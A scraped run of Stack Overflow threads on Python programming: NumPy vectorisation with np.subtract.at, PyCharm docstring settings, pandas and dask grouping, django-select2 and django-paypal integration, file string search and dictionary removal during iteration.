array([[ 0.80195208, 0.40566743, 0.62585574, 0.53571781],
[ 0.56643339, 0.4635662 , 0.4290103 , 0.14457036],
[ 0.31823491, 0.12329964, 0.41682841, 0.09544716]])
In [260]: y
Out[260]: array([1, 2, 2])
</code></pre>
<p>First off, we create the 2D mask of <code>y</code> indices spread across the length of dW's second axis.</p>
<p>Let <code>dW</code> be a <code>4 x 5</code> shaped array. So, the mask would be :</p>
<pre><code>In [261]: mask = (np.arange(dW.shape[1])[:,None] == y)
In [262]: mask
Out[262]:
array([[False, False, False],
[ True, False, False],
[False, True, True],
[False, False, False],
[False, False, False]], dtype=bool)
</code></pre>
<p>This is using <a href="http://docs.scipy.org/doc/numpy/user/basics.broadcasting.html" rel="nofollow"><code>NumPy broadcasting</code></a> here to create a <code>2D</code> mask.</p>
<p>Next up, we use matrix-multiplication to sum-aggregate the same indices from <code>y</code> -</p>
<pre><code>In [264]: mask.dot(X)
Out[264]:
array([[ 0. , 0. , 0. , 0. ],
[ 0.80195208, 0.40566743, 0.62585574, 0.53571781],
[ 0.8846683 , 0.58686584, 0.84583872, 0.24001752],
[ 0. , 0. , 0. , 0. ],
[ 0. , 0. , 0. , 0. ]])
</code></pre>
<p>Thus, corresponding to the third row of the mask that has <code>True</code> values at second and third columns, we would sum up the second and third rows from <code>X</code> with that matrix-multiplication. This would be put as the third row in the multiplication output.</p>
<p>Since, in the original loopy code we are updating <code>dW</code> across columns, we need to transpose the multiplication result and then update.</p>
<hr>
<p><strong>Approach #2</strong> Here's another vectorized way, though not a one-liner using <a href="http://docs.scipy.org/doc/numpy/reference/generated/numpy.ufunc.at.html" rel="nofollow"><code>np.add.reduceat</code></a> -</p>
<pre><code>sidx = y.argsort()
unq,shift_idx = np.unique(y[sidx],return_index=True)
dWout[:,unq] -= np.add.reduceat(X[sidx],shift_idx,axis=0).T
</code></pre>
| 1 | 2016-09-27T17:31:37Z | [
"python",
"numpy",
"matrix",
"indexing",
"vectorization"
]
|
Trying to Remove for-Loops from Python code, Performing Operations with a Look-up Table On Matrices | 39,730,616 | <p>I feel like this is a similar problem to the one I asked before, but I can't figure it out. How can I convert these two lines of code into one line with no for-loop?</p>
<pre><code>for i in xrange(X.shape[0]):
dW[:,y[i]] -= X[i]
</code></pre>
<p>In English, every row in matrix X should be subtracted from a corresponding column in matrix dW given by the vector y.</p>
<p>I should mention dW is DXC and X is NXD, so the transpose of X does not have the same shape as W, otherwise I could re-order the the rows of X, and take the transpose directly. However, it is possible for the columns in dW to have multiple corresponding rows which need to be subtracted.</p>
<p>I feel like I do not have a firm grasp of how indexing in python is supposed to work, which makes it difficult to remove unnecessary for-loops, or even to know what for-loops are possible to remove. </p>
| 0 | 2016-09-27T17:10:47Z | 39,732,328 | <p>The straightforward way to vectorize would be:</p>
<pre><code>dW[:,y] -= X.T
</code></pre>
<p>Except, though not very obvious or well-documented, this will give problems with repeated indices in <code>y</code>. For these situations there is the <code>ufunc.at</code> method (elementwise operations in numpy are implemented as "ufunc's" or "universal functions"). Quote from <a href="http://docs.scipy.org/doc/numpy/reference/generated/numpy.ufunc.at.html" rel="nofollow">the docs</a>:</p>
<blockquote>
<p>ufunc.at(a, indices, b=None)</p>
<p>Performs unbuffered in place operation on operand âaâ for elements specified by âindicesâ. For addition ufunc, this method is equivalent to a[indices] += b, except that results are accumulated for elements that are indexed more than once. For example, a[[0,0]] += 1 will only increment the first element once because of buffering, whereas add.at(a, [0,0], 1) will increment the first element twice.</p>
</blockquote>
<p>So in your case:</p>
<pre><code>np.subtract.at(dW.T, y, X)
</code></pre>
<p>Unfortunately, <code>ufunc.at</code> is relatively inefficient as far as vectorization techniques go, so the speedup compared to the loop might not be that impressive.</p>
| 1 | 2016-09-27T18:55:55Z | [
"python",
"numpy",
"matrix",
"indexing",
"vectorization"
]
|
How to change PyCharms doctring autocomplete | 39,730,701 | <p>I have been programming in PyCharm for a little while now and I like it just fine however there is one little thing that is nagging at me, when I go to generate a new docstring for a function that I have defined PyCharm will autocomplete the docstring using what I believe is sphinx style formatting. Example in picture below:</p>
<p><a href="http://i.stack.imgur.com/Cz66Q.png" rel="nofollow"><img src="http://i.stack.imgur.com/Cz66Q.png" alt="PyCharm default docstring autocomplete"></a></p>
<p>I'd like to change this format to something appear like the docstrings throughout the numpy module. Here is the beginning of the docstring for numpy.max for an example;</p>
<p><a href="http://i.stack.imgur.com/8S0ma.png" rel="nofollow"><img src="http://i.stack.imgur.com/8S0ma.png" alt="Docstring for numpy.max"></a></p>
<p>Is there a way I can either A) quickly swap the PyCharm docstring autocomplete method or B) cumstomize the existing autocomplete method? </p>
| 0 | 2016-09-27T17:16:42Z | 39,730,865 | <p>You can adjust this by going to the <a href="https://www.jetbrains.com/help/pycharm/2016.1/python-integrated-tools.html" rel="nofollow">Python Integrated Tools</a> settings.</p>
<h3>On Windows/Linux</h3>
<pre><code>File -> Settings -> Tools -> Python Integrated Tools
</code></pre>
<h3>On OS X</h3>
<pre><code>PyCharm -> Preferences -> Tools -> Python Integrated Tools
</code></pre>
<p>Then there is a <code>Docstrings</code> section. Change the drop down format to <code>NumPy</code> and press "OK"</p>
<p><a href="http://i.stack.imgur.com/qH5AC.png" rel="nofollow"><img src="http://i.stack.imgur.com/qH5AC.png" alt="Docstring format"></a></p>
| 3 | 2016-09-27T17:26:51Z | [
"python",
"python-3.x",
"pycharm",
"jetbrains"
]
|
Panda group dataframe based on datetime type into different period ignoring date part | 39,730,737 | <p>I want to group the rows into groups, based on variable time interval.
However, when doing grouping, I want to ignore the date part, only group based on the time date. </p>
<p>Say I want to group every 5 minutes.</p>
<pre><code> timestampe val
0 2016-08-11 11:03:00 0.1
1 2016-08-13 11:06:00 0.3
2 2016-08-09 11:04:00 0.5
3 2016-08-05 11:35:00 0.7
4 2016-08-19 11:09:00 0.8
5 2016-08-21 12:37:00 0.9
into
timestampe val
0 2016-08-11 11:03:00 0.1
2 2016-08-09 11:04:00 0.5
timestampe val
1 2016-08-13 11:06:00 0.3
4 2016-08-19 11:09:00 0.8
timestampe val
3 2016-08-05 11:35:00 0.7
timestampe val
5 2016-08-21 12:37:00 0.9
</code></pre>
<p>Notice as long as the time is within the same 5 minutes interval, the rows are grouped, regardless of the date.</p>
| 2 | 2016-09-27T17:18:55Z | 39,731,398 | <p>This is assuming you split the day up into 5 minute windows</p>
<pre><code>df.groupby(df.timestampe.dt.hour.mul(60) \
.add(df.timestampe.dt.minute) // 5) \
.apply(pd.DataFrame.reset_index)
</code></pre>
<p><a href="http://i.stack.imgur.com/7Y76B.png" rel="nofollow"><img src="http://i.stack.imgur.com/7Y76B.png" alt="enter image description here"></a></p>
<hr>
<pre><code>for name, group in df.groupby(df.timestampe.dt.hour.mul(60).add(df.timestampe.dt.minute) // 5):
print name
print group
print
132
timestampe val
0 2016-08-11 11:03:00 0.1
2 2016-08-09 11:04:00 0.5
133
timestampe val
1 2016-08-13 11:06:00 0.3
4 2016-08-19 11:09:00 0.8
139
timestampe val
3 2016-08-05 11:35:00 0.7
151
timestampe val
5 2016-08-21 12:37:00 0.9
</code></pre>
| 3 | 2016-09-27T17:59:58Z | [
"python",
"datetime",
"pandas",
"numpy",
"scipy"
]
|
Panda group dataframe based on datetime type into different period ignoring date part | 39,730,737 | <p>I want to group the rows into groups, based on variable time interval.
However, when doing grouping, I want to ignore the date part, only group based on the time date. </p>
<p>Say I want to group every 5 minutes.</p>
<pre><code> timestampe val
0 2016-08-11 11:03:00 0.1
1 2016-08-13 11:06:00 0.3
2 2016-08-09 11:04:00 0.5
3 2016-08-05 11:35:00 0.7
4 2016-08-19 11:09:00 0.8
5 2016-08-21 12:37:00 0.9
into
timestampe val
0 2016-08-11 11:03:00 0.1
2 2016-08-09 11:04:00 0.5
timestampe val
1 2016-08-13 11:06:00 0.3
4 2016-08-19 11:09:00 0.8
timestampe val
3 2016-08-05 11:35:00 0.7
timestampe val
5 2016-08-21 12:37:00 0.9
</code></pre>
<p>Notice as long as the time is within the same 5 minutes interval, the rows are grouped, regardless of the date.</p>
| 2 | 2016-09-27T17:18:55Z | 39,731,526 | <p>Since you do not care about the <code>date</code> part of your <code>datetime</code> object, I think that make all <code>date</code> equal is a good trick.</p>
<pre><code>df['time'] = df['timestamp'].apply(lambda x: x.replace(year=2000, month=1, day=1))
</code></pre>
<p>You get:</p>
<pre><code> timestamp val time
0 2016-08-11 11:03:00 0.1 2000-01-01 11:03:00
1 2016-08-13 11:06:00 0.3 2000-01-01 11:06:00
2 2016-08-09 11:04:00 0.5 2000-01-01 11:04:00
3 2016-08-05 11:35:00 0.7 2000-01-01 11:35:00
4 2016-08-19 11:09:00 0.8 2000-01-01 11:09:00
5 2016-08-21 11:37:00 0.9 2000-01-01 11:37:00
</code></pre>
<p>Now you can do what you what on <code>time</code> column. For example, groups on every 5 mins:</p>
<pre><code>grouped = df.groupby(Grouper(key='time', freq='5min'))
grouped.count()
timestamp val
time
2000-01-01 11:00:00 2 2
2000-01-01 11:05:00 2 2
2000-01-01 11:10:00 0 0
2000-01-01 11:15:00 0 0
2000-01-01 11:20:00 0 0
2000-01-01 11:25:00 0 0
2000-01-01 11:30:00 0 0
2000-01-01 11:35:00 2 2
</code></pre>
<p>Hope this trick may be suitable for your need. Thanks!</p>
| 0 | 2016-09-27T18:07:19Z | [
"python",
"datetime",
"pandas",
"numpy",
"scipy"
]
|
ModelSelect2MultipleField not defined | 39,730,764 | <p>Does anybody know where ModelSelect2MultipleField is imported from?
I've been trying to import it into a file that I need, and I thought that I could do it with</p>
<pre><code>from django_select2.fields import ModelSelect2MultipleField
</code></pre>
<p>but I keep getting errors.
Before when I had it </p>
<pre><code>from django_select2 import *
</code></pre>
<p>It said that ModelSelect2MultipleField, which I use in the py file, was not defined. Now it says that there is no module named fields.</p>
<p>The .py file I'm talking about can be found here (<a href="https://bitbucket.org/cbplusd/wibo/src/efc144e1bdc1eb52f76591c60ff0a1d40464b0ed/reports/forms.py?at=master&fileviewer=file-view-default" rel="nofollow">https://bitbucket.org/cbplusd/wibo/src/efc144e1bdc1eb52f76591c60ff0a1d40464b0ed/reports/forms.py?at=master&fileviewer=file-view-default</a>).</p>
<p>The Django-Select2 I have installed is version 5.8.9, so is there another way to import ModelSelect2MultipleField other than this way?</p>
<p>Thanks in advance!</p>
| 0 | 2016-09-27T17:21:07Z | 39,730,849 | <p>You need to use <code>from django_select2.forms import ModelSelect2MultipleWidget</code>. I found this by looking at the test application <a href="https://github.com/applegrew/django-select2/blob/master/tests/testapp/forms.py" rel="nofollow">here</a>.</p>
<p>There is no ModelSelect2MultipleField there is however a ModelSelect2MultipleWidget which should do what you need.</p>
| 0 | 2016-09-27T17:25:52Z | [
"python",
"django"
]
|
ModelSelect2MultipleField not defined | 39,730,764 | <p>Does anybody know where ModelSelect2MultipleField is imported from?
I've been trying to import it into a file that I need, and I thought that I could do it with</p>
<pre><code>from django_select2.fields import ModelSelect2MultipleField
</code></pre>
<p>but I keep getting errors.
Before when I had it </p>
<pre><code>from django_select2 import *
</code></pre>
<p>It said that ModelSelect2MultipleField, which I use in the py file, was not defined. Now it says that there is no module named fields.</p>
<p>The .py file I'm talking about can be found here (<a href="https://bitbucket.org/cbplusd/wibo/src/efc144e1bdc1eb52f76591c60ff0a1d40464b0ed/reports/forms.py?at=master&fileviewer=file-view-default" rel="nofollow">https://bitbucket.org/cbplusd/wibo/src/efc144e1bdc1eb52f76591c60ff0a1d40464b0ed/reports/forms.py?at=master&fileviewer=file-view-default</a>).</p>
<p>The Django-Select2 I have installed is version 5.8.9, so is there another way to import ModelSelect2MultipleField other than this way?</p>
<p>Thanks in advance!</p>
| 0 | 2016-09-27T17:21:07Z | 39,731,927 | <p>You must initialise the form field as a Django widget and then specify the add-on widget in the parameters like so:</p>
<p>clients = ModelMultipleChoiceField(required=False, queryset=Contact.objects, widget=Select2MultipleWidget())</p>
| 0 | 2016-09-27T18:31:26Z | [
"python",
"django"
]
|
Paypal Transactions: How to receive and send funds with PayPal API and Django? | 39,730,787 | <p>i've been wondering to make payment system for my Django website, but with PayPal it seems to be easier for users, i've heard there is special API for python, so it can be used with Django.</p>
<hr>
<p>So for example, There is user account and my account, i make a receiver function, which listens to the payment gateway and whenever user sends funds to the email, it does a specific commands. Now i also make a sender function, so i can send funds to users, Now if API get's users email whenever they see HTTP Response of Paypal paying window, i want to make a function to send it to specific email.</p>
<p>Also another example with code:</p>
<pre><code>import random
from process import multiprocessing
Users = [ "..." ]
# PayPal:
import SomePayPalApi
def Receiver():
SomePayPalApi.receive_to = SomePayPalApi.current_user.email
while True:
if SomePayPalApi.recieved:
print SomePaypalApi.recieved.amount
print SomePaypalApi.received.email
print SomePaypalApi.Balance
received = True
break
def Sender():
SomePayPalApi.sendto = random.choice(Users)
SomePayPalApi.send()
if __name__ == "__main__":
p1 = Process(target=Receiver)
p2 = Process(target=Sender)
p1.start()
p2.start()
</code></pre>
<p>I know it's not as easy as example, but i am looking for two general functions of PayPal, Paying and Receiving, How can i achieve this API on Django? Also if possible, How can i see amount of money received on my account and balance of my account? Can i use PayPal Api documentation for Django?
How can paying back be done in Django-Paypal Library?</p>
| 2 | 2016-09-27T17:22:39Z | 39,731,776 | <p>Have you considered using django-paypal as one of your installed apps?</p>
<p>It looks fit for purpose and may provide what you require. </p>
<p>Take a look:</p>
<p><a href="https://github.com/spookylukey/django-paypal" rel="nofollow">https://github.com/spookylukey/django-paypal</a>
<a href="https://django-paypal.readthedocs.io/en/stable/overview.html" rel="nofollow">https://django-paypal.readthedocs.io/en/stable/overview.html</a></p>
| 1 | 2016-09-27T18:23:07Z | [
"python",
"django",
"paypal",
"django-paypal"
]
|
Paypal Transactions: How to receive and send funds with PayPal API and Django? | 39,730,787 | <p>i've been wondering to make payment system for my Django website, but with PayPal it seems to be easier for users, i've heard there is special API for python, so it can be used with Django.</p>
<hr>
<p>So for example, There is user account and my account, i make a receiver function, which listens to the payment gateway and whenever user sends funds to the email, it does a specific commands. Now i also make a sender function, so i can send funds to users, Now if API get's users email whenever they see HTTP Response of Paypal paying window, i want to make a function to send it to specific email.</p>
<p>Also another example with code:</p>
<pre><code>import random
from process import multiprocessing
Users = [ "..." ]
# PayPal:
import SomePayPalApi
def Receiver():
SomePayPalApi.receive_to = SomePayPalApi.current_user.email
while True:
if SomePayPalApi.recieved:
print SomePaypalApi.recieved.amount
print SomePaypalApi.received.email
print SomePaypalApi.Balance
received = True
break
def Sender():
SomePayPalApi.sendto = random.choice(Users)
SomePayPalApi.send()
if __name__ == "__main__":
p1 = Process(target=Receiver)
p2 = Process(target=Sender)
p1.start()
p2.start()
</code></pre>
<p>I know it's not as easy as example, but i am looking for two general functions of PayPal, Paying and Receiving, How can i achieve this API on Django? Also if possible, How can i see amount of money received on my account and balance of my account? Can i use PayPal Api documentation for Django?
How can paying back be done in Django-Paypal Library?</p>
| 2 | 2016-09-27T17:22:39Z | 39,731,854 | <p>I am not sure about email, but if you want to access paypal ammounts, this might help.
<a href="http://stackoverflow.com/questions/34379905/get-amount-from-django-paypal?rq=1">Get amount from django-paypal</a></p>
| 1 | 2016-09-27T18:27:15Z | [
"python",
"django",
"paypal",
"django-paypal"
]
|
Pandas return column value if other column value is equal | 39,730,906 | <p>so recentyl im trying to get data from CSV file using python and pandas.
Code should return or print data from colum 1 if data from column 2 is equal to some string. </p>
<pre><code> import pandas as pd
df = pd.read_csv('alerts.csv', sep=';', encoding='latin1')
print(df[['color']['item']].loc[['color']=='red'])
</code></pre>
<p>but its seems not working with strings ?</p>
| 0 | 2016-09-27T17:28:50Z | 39,730,997 | <p>you are not using .loc correctly</p>
<p>.loc need an indexer, and columns such has</p>
<pre><code>indexer = df[df['color']=='red'].index
print(df.loc[indexer,'item'])
</code></pre>
| 0 | 2016-09-27T17:33:35Z | [
"python",
"csv",
"pandas"
]
|
Trying to return number of items in a list as a column in a dataframe | 39,730,951 | <p>I have a pandas dataframe, 'df', like the following:</p>
<pre><code> name things_in_bag
0 Don [orange, pear, apple]
1 Tommy [banana, pear, apple, watermelon]
2 Larry [cucumber]
.
.
1084 Jen [pear, baseball]
</code></pre>
<p>I want to add a column called 'number_things' that totals the things in the bag.</p>
<p>I know I can use len() to get the count of the items in those arrays, however, the problem is accessing the index. So the number of items in the first row is len(df.loc[0, 'things_in_bag']).</p>
<p>But how do I populate all 1084 rows of the new column?</p>
| 1 | 2016-09-27T17:31:01Z | 39,731,042 | <p>you can use apply and look at the len of the list such as</p>
<pre><code>df['things_in_bag'].apply(len)
</code></pre>
<p>if you want to populate a new columns with that data you can then do</p>
<pre><code>df['newcol'] = df['things_in_bag'].apply(len)
</code></pre>
| 1 | 2016-09-27T17:37:02Z | [
"python",
"pandas",
"dataframe"
]
|
Grouping values in an array | 39,730,970 | <p>I have a numpy array of size a*2. (Typical size of a is 100). In the first column are values between x_smallest and x_largest. In the second column are the corresponding y values. Now almost all x values are unique, so I want to group them. Like the first group goes from values x_smallest to x_1. The second group from x_1 to x_2. (x_smallest < x_1 < ... x_largest). This should be adjustable, so that I can find a useful size. I should mention that the x values are Not integers, but the y values are integers. (The y values are between 1 and N) Now I would like to know for each group the proportion of "n>1" y values against the "1" y values. Here is a small fraction of an example array:</p>
<pre><code>2.750000000000000000e+00,2.000000000000000000e+00
3.100000000000000089e+00,5.000000000000000000e+00
2.649999999999999911e+00,2.000000000000000000e+00
2.500000000000000000e+00,2.000000000000000000e+00
3.100000000000000089e+00,2.000000000000000000e+00
2.799999999999999822e+00,5.000000000000000000e+00
3.450000000000000178e+00,4.000000000000000000e+00
3.200000000000000178e+00,5.000000000000000000e+00
3.200000000000000178e+00,3.000000000000000000e+00
2.399999999999999911e+00,1.000000000000000000e+00
</code></pre>
<p>The output array could look like this:</p>
<pre><code>1.5, 0
2.5, 0.2
3.5, 0.5
</code></pre>
<p>(Here the x_values are the midpoint of the area of x_i and x_i+1. )The output example here clearly doesn't fit to the example array. Do you have any ideas how this can be done easily. I could only think about making many specific if else commands which wouldn't be very helpful for general cases.</p>
| 0 | 2016-09-27T17:32:05Z | 39,732,864 | <p>Okay, I think I solved it by myself. Here is the solution in case someone has a similiar problem and find this question:</p>
<pre><code>numgroup = 5 # Number of Groups
dmimax = numpy.amax(dmivsstasta[:, 0]) # Gets x_largest
dmimin = numpy.amin(dmivsstasta[:, 0]) # Gets x_smallest
stamax = numpy.amax(dmivsstasta[:, 1]) # Gets y_largest
stepsize = (dmimax-dmimin)/5.0 # Determines size of a group
grouparray = numpy.zeros((5, stamax+1)) # Creates array in which everything is saved
for x in range(numgroup):
grouparray[x, 0] = dmimin+stepsize/2.0+x*stepsize # Saves midpositon of
each group at first column
print(grouparray) # Just to check values
print(dmimin)
print(dmimax)
print(stepsize)
for x1 in range(numgroup): # Iterates over all values
for x2 in range(rd):
if (grouparray[x1, 0]-stepsize/2.0) <= dmivsstasta[x2, 0]
< (grouparray[x1, 0]+stepsize/2.0):
grouparray[x1, dmivsstasta[x2, 1]] += 1
print(grouparray)
</code></pre>
<p>The only missing part is to calculate the proportion, which is now easy to do with the grouparray </p>
| 0 | 2016-09-27T19:30:52Z | [
"python",
"arrays",
"numpy"
]
|
What is the frontend language/platform of api.ai and wit.ai? | 39,731,005 | <p>I am trying to develop a web application like wit.ai or api.ai. I am not sure what would be the best frontend language/platform/technology for such a web applications.
In api.ai and wit.ai you create chat robots. For each robot the user define a bunch of keywords as entity. For example</p>
<p><code>Entity: Pizza -> {Italian, French, Greek}</code></p>
<p>Then the user define templates for the input sentences and assign the keywords of the input sentence to the corresponding entities. For example:</p>
<pre><code>I would like to order a Italian with two topping.
</code></pre>
<p>In the sentence above, the user assign the "Italian" keyword to the "Pizza" entity. Then they just assign a output response for such a input.
The frontend should let the user performs these tasks such as highlighting a keyword, assigning to entities, showing lists of entities to the user.
Since the algorithms that I am developing are in Python, I was thinking about using Django. Do you think it is the best platform for the such a task?</p>
<p>I really appreciate your help.</p>
<p>Amir</p>
| 0 | 2016-09-27T17:34:14Z | 39,793,723 | <p>While questions about technology are typically subjective and have no 'right' answer, a 'frontend' esque language will do you a lot of good here.</p>
<p>Something like JS, nodejs etc.. You need to be able to highlight the words on the client side and not make any request to the server yet until the user specifies what the highlighted text is. Ofcourse the service that powers your API (to persist the selected entity information) can be powered by py or any language that makes you smile :)</p>
<p>All the best</p>
| 0 | 2016-09-30T14:20:32Z | [
"python",
"django",
"frontend",
"chatbot"
]
|
Python If Variable in Variable | 39,731,026 | <p>I Have Made A File Called <code>helloworld.simon</code>.
In There I Have Written:</p>
<pre><code>Public class helloworld {
main = (main.method());
main {
console.print("Hello World");
}
</code></pre>
<p>And I Have Written This Code:</p>
<pre><code>Public = ("Public")
Private = ("Private")
code = open('helloworld.simon' , 'r')
print(code.read())
if Public in code:
print("Pub")
else:
print("J")
</code></pre>
<p>And The <em>Output</em> Is:</p>
<pre><code>Public class helloworld {
main = (main.method());
main {
console.print("Hello World");
}
J
</code></pre>
| -1 | 2016-09-27T17:35:44Z | 39,731,141 | <p>Change this line:</p>
<p><code>code = open('helloworld.simon' , 'r')</code></p>
<p>To this:</p>
<pre><code>with open('helloworld.simon' , 'r') as f:
lines = f.readlines()
if any([line for line in lines if Public in line]):
print("Pub")
else:
print("J")
</code></pre>
| 0 | 2016-09-27T17:43:41Z | [
"python",
"file",
"filereader"
]
|
Python If Variable in Variable | 39,731,026 | <p>I Have Made A File Called <code>helloworld.simon</code>.
In There I Have Written:</p>
<pre><code>Public class helloworld {
main = (main.method());
main {
console.print("Hello World");
}
</code></pre>
<p>And I Have Written This Code:</p>
<pre><code>Public = ("Public")
Private = ("Private")
code = open('helloworld.simon' , 'r')
print(code.read())
if Public in code:
print("Pub")
else:
print("J")
</code></pre>
<p>And The <em>Output</em> Is:</p>
<pre><code>Public class helloworld {
main = (main.method());
main {
console.print("Hello World");
}
J
</code></pre>
| -1 | 2016-09-27T17:35:44Z | 39,731,267 | <p>File reading is sequential. Once you read a file (with <code>print(code.read())</code> you cant read back again, unless restart reading with <code>code.seek(0)</code></p>
<pre><code>Public = ("Public")
Private = ("Private")
code = open('helloworld.simon' , 'r')
print(code.read())
code.seek(0)
if Public in code.read():
print("Pub")
else:
print("J")
code.close()
</code></pre>
<p>outputs:</p>
<pre><code>Pub
</code></pre>
<p>If you comment <code>code.seek(0)</code>, outputs J</p>
| 1 | 2016-09-27T17:51:56Z | [
"python",
"file",
"filereader"
]
|
Application of Removing Items from Dictionaries | 39,731,032 | <p>Suppose I have a dictionary that contains instances of kinematic objects. Each kinematic object has a position, velocity, etc. On each timestep update for the program, I want to check to see if two active objects (not the same object, mind you) occupy the same position in the reference frame. If they do, this would simulate a collision, the two objects involved would be destroyed, and their instances would be removed from the active objects dictionary.</p>
<pre><code>dict actives{ 'missile' : object_c(x1, y1, z1),
'target' : object_c(x2, y2, z2),
'clutter' : object_c(x3, y3, z3),
... }
...
for key1 in self.actives.keys():
for key2 in self.actives.keys():
if not key1 == key2:
# Get Inertial Positions and Distance
Pos21 = self.actives[key2].Pos - self.actives[key1].Pos
distance = math.sqrt(sum(Pos21**2))
# If Distance <= Critical Distance
if distance <= 1.0e0
# Remove key1 and key2 from Actives
# -- This is where I need help --
</code></pre>
<p>I can't use <code>del</code>: the keys (and objects) would be removed from actives, but the <code>for</code> loops' conditions fail to recognize this and will encounter a KeyError. What can I do to remove these objects from actives while accessing the keys for the loop conditions?</p>
| 0 | 2016-09-27T17:36:23Z | 39,731,085 | <p>Simple solution, add the keys you want to remove to a list and then remove them after looping through all elements:</p>
<pre><code>dict actives{ 'missile' : object_c(x1, y1, z1),
'target' : object_c(x2, y2, z2),
'clutter' : object_c(x3, y3, z3),
... }
to_be_removed = list()
</code></pre>
<p>...</p>
<pre><code>for key1 in self.actives.keys():
for key2 in self.actives.keys():
if not key1 == key2:
# Get Inertial Positions and Distance
Pos21 = self.actives[key2].Pos - self.actives[key1].Pos
distance = math.sqrt(sum(Pos21**2))
# If Distance <= Critical Distance
if distance <= 1.0e0
# Remove key1 and key2 from Actives
# -- This is where I need help --
to_be_removed.append(key1)
to_be_removed.append(key2)
for remove_me in to_be_removed:
self.actives.pop(remove_me, None)
</code></pre>
| 1 | 2016-09-27T17:40:12Z | [
"python",
"dictionary"
]
|
Application of Removing Items from Dictionaries | 39,731,032 | <p>Suppose I have a dictionary that contains instances of kinematic objects. Each kinematic object has a position, velocity, etc. On each timestep update for the program, I want to check to see if two active objects (not the same object, mind you) occupy the same position in the reference frame. If they do, this would simulate a collision, the two objects involved would be destroyed, and their instances would be removed from the active objects dictionary.</p>
<pre><code>dict actives{ 'missile' : object_c(x1, y1, z1),
'target' : object_c(x2, y2, z2),
'clutter' : object_c(x3, y3, z3),
... }
...
for key1 in self.actives.keys():
for key2 in self.actives.keys():
if not key1 == key2:
# Get Inertial Positions and Distance
Pos21 = self.actives[key2].Pos - self.actives[key1].Pos
distance = math.sqrt(sum(Pos21**2))
# If Distance <= Critical Distance
if distance <= 1.0e0
# Remove key1 and key2 from Actives
# -- This is where I need help --
</code></pre>
<p>I can't use <code>del</code>: the keys (and objects) would be removed from actives, but the <code>for</code> loops' conditions fail to recognize this and will encounter a KeyError. What can I do to remove these objects from actives while accessing the keys for the loop conditions?</p>
| 0 | 2016-09-27T17:36:23Z | 39,731,126 | <p>As you're looping, you can double-check that the key is still present:</p>
<pre><code>for key1 in self.actives.keys():
if key1 not in self.actives:
continue
for key2 in self.actives.keys():
if key2 not in self.actives:
continue
# okay, both keys are still here. go do stuff
if not key1 == key2:
</code></pre>
| 1 | 2016-09-27T17:42:19Z | [
"python",
"dictionary"
]
|
Application of Removing Items from Dictionaries | 39,731,032 | <p>Suppose I have a dictionary that contains instances of kinematic objects. Each kinematic object has a position, velocity, etc. On each timestep update for the program, I want to check to see if two active objects (not the same object, mind you) occupy the same position in the reference frame. If they do, this would simulate a collision, the two objects involved would be destroyed, and their instances would be removed from the active objects dictionary.</p>
<pre><code>dict actives{ 'missile' : object_c(x1, y1, z1),
'target' : object_c(x2, y2, z2),
'clutter' : object_c(x3, y3, z3),
... }
...
for key1 in self.actives.keys():
for key2 in self.actives.keys():
if not key1 == key2:
# Get Inertial Positions and Distance
Pos21 = self.actives[key2].Pos - self.actives[key1].Pos
distance = math.sqrt(sum(Pos21**2))
# If Distance <= Critical Distance
if distance <= 1.0e0
# Remove key1 and key2 from Actives
# -- This is where I need help --
</code></pre>
<p>I can't use <code>del</code>: the keys (and objects) would be removed from actives, but the <code>for</code> loops' conditions fail to recognize this and will encounter a KeyError. What can I do to remove these objects from actives while accessing the keys for the loop conditions?</p>
| 0 | 2016-09-27T17:36:23Z | 39,732,307 | <p>I think Maximilian Peters had the right basic idea, but the items to be removed should be kept in a <code>set</code> rather than a <code>list</code> to avoid issues with an active key being in it multiple times. To further hasten the collision detection process, I changed the comparison loop to use the <a href="https://docs.python.org/2/library/itertools.html#itertools.combinations" rel="nofollow"><code>itertools.combinations()</code></a> generator function so as to only test unique pairs of objects.</p>
<p>I also had to add a fair amount of scaffolding to make it possible test the code in a context like you probably have it running in...</p>
<pre><code>from itertools import combinations
import math
CRITICAL_DIST = 2.0e0
class ObjectC(object):
def __init__(self, x, y, z):
self.posn = x, y, z
def __repr__(self):
return '{}({}, {}, {})'.format(self.__class__.__name__, *self.posn)
class Game(object):
def remove_collisons(self):
to_remove = set()
for key1, key2 in combinations(self.actives, 2):
# Calculate distance.
deltas = (
(self.actives[key2].posn[0] - self.actives[key1].posn[0])**2,
(self.actives[key2].posn[1] - self.actives[key1].posn[1])**2,
(self.actives[key2].posn[2] - self.actives[key1].posn[2])**2)
distance = math.sqrt(sum(deltas))
# Check for collision.
if distance <= CRITICAL_DIST:
to_remove |= {key1, key2} # both objects should be removed
if to_remove:
print('removing: {!r}'.format(list(to_remove)))
self.actives = {
k: v for k, v in self.actives.items() if k not in to_remove}
x1, y1, z1 = 0, 1, 2
x2, y2, z2 = 1, 2, 3
x3, y3, z3 = 2, 3, 1
actives = {'missile' : ObjectC(x1, y1, z1),
'target' : ObjectC(x2, y2, z2),
'clutter' : ObjectC(x3, y3, z3),
} # ...
game = Game()
game.actives = actives
print('before: {}'.format(game.actives))
game.remove_collisons()
print('after: {}'.format(game.actives))
</code></pre>
<p>Output:</p>
<pre class="lang-none prettyprint-override"><code> before: {'clutter': ObjectC(2, 3, 1), 'target': ObjectC(1, 2, 3), 'missile': ObjectC(0, 1, 2)}
removing: ['target', 'missile']
after: {'clutter': ObjectC(2, 3, 1)}
</code></pre>
| 1 | 2016-09-27T18:54:21Z | [
"python",
"dictionary"
]
|
iterate over GroupBy object in dask | 39,731,098 | <p>Is it possible, to iterate over a dask GroupBy object to get access to the underlying dataframes? I tried:</p>
<pre><code>import dask.dataframe as dd
import pandas as pd
pdf = pd.DataFrame({'A':[1,2,3,4,5], 'B':['1','1','a','a','a']})
ddf = dd.from_pandas(pdf, npartitions = 3)
groups = ddf.groupby('B')
for name, df in groups:
print(name)
</code></pre>
<p>However, this results in an error: <code>KeyError: 'Column not found: 0'</code></p>
<p>More generally speaking, what kind of interactions does the dask GroupBy object allow, except from the apply method?</p>
| 1 | 2016-09-27T17:40:48Z | 39,732,788 | <p>you could iterate through groups doing this with dask, maybe there is a better way but this works for me.</p>
<pre><code>import dask.dataframe as dd
import pandas as pd
pdf = pd.DataFrame({'A':[1, 2, 3, 4, 5], 'B':['1','1','a','a','a']})
ddf = dd.from_pandas(pdf, npartitions = 3)
groups = ddf.groupby('B')
for group in pdf['B'].unique():
print groups.get_group(group)
</code></pre>
<p>this would return</p>
<pre><code>dd.DataFrame<dataframe-groupby-get_group-e3ebb5d5a6a8001da9bb7653fface4c1, divisions=(0, 2, 4, 4)>
